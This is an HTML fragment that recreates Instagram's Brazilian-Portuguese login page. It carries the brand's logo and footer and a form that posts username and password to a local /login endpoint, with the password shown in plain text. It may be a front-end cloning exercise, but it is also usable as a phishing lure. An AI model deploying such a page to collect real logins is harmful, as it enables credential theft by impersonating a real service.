<div class="divmain">
    <div class="img">
        <img src="imagens/cell.png" alt="" class="imgcell">
        <img src="imagens/screenshot1.png" alt="" class="imgscreen">
    </div>
    <div class="ladodireito">
        <div class="dados">
            <div class="form-img">
                <div class="form-img-i"><i data-visualcompletion="css-img" aria-label="Instagram" class="" role="img"
                        style="background-image: url(&quot;https://static.cdninstagram.com/rsrc.php/v3/y-/r/yXM3FgMdVNX.png&quot;); background-position: 0px -52px; background-size: auto; width: 175px; height: 51px; background-repeat: no-repeat; display: inline-block;"></i>
                </div>
            </div>
            <div class="form">
                <form action="/login" method="post">
                    <input type="text" name="user" id="user" placeholder="Telefone, nome de usuário ou email">
                    <input type="text" name="password" id="password" placeholder="Senha">
                    <input type="submit" value="Entrar" class="sub">
                </form>
            </div>
            <p>OU</p>
            <div class="esqueceusenhadiv">
                <a href="" class="fb">Entrar com o Facebook</a>
                <a href="" class="esqueceu">Esqueceu a senha?</a>
            </div>
        </div>
        <div class="criarconta">
            <p>Não tem uma conta? <a href="/signup">Cadastre-se</a></p>
        </div>
        <div class="aplicativos">
            <p>Obtenha o aplicativo.</p>
            <div class="imgs-aplicativos">
                <div class="googleplay">
                    <img src="imagens/googleplay.png" alt="" class="imggoogle">
                </div>
                <div class="microsoft">
                    <img src="imagens/microsoft.png" alt="" class="imgmicro">
                </div>
            </div>
        </div>
    </div>
</div>




<div class="footer">

    <div class="links">
        <ul>
            <li>Meta</li>
            <li>Sobre</li>
            <li>Blog</li>
            <li>Carreiras</li>
            <li>Ajuda</li>
            <li>API</li>
            <li>Privacidade</li>
            <li>Termos</li>
            <li>Principais contas</li>
            <li>Hashtags</li>
            <li>Localizações</li>
            <li>Instagram Lite</li>
            <li>Carregamento de contatos e não usuários</li>
        </ul>
    </div>

    <div class="lang">

        <ul>
            <li>Português (Brasil)</li>
            <li> &copy Instagram from Meta</li>
        </ul>

    </div>

</div>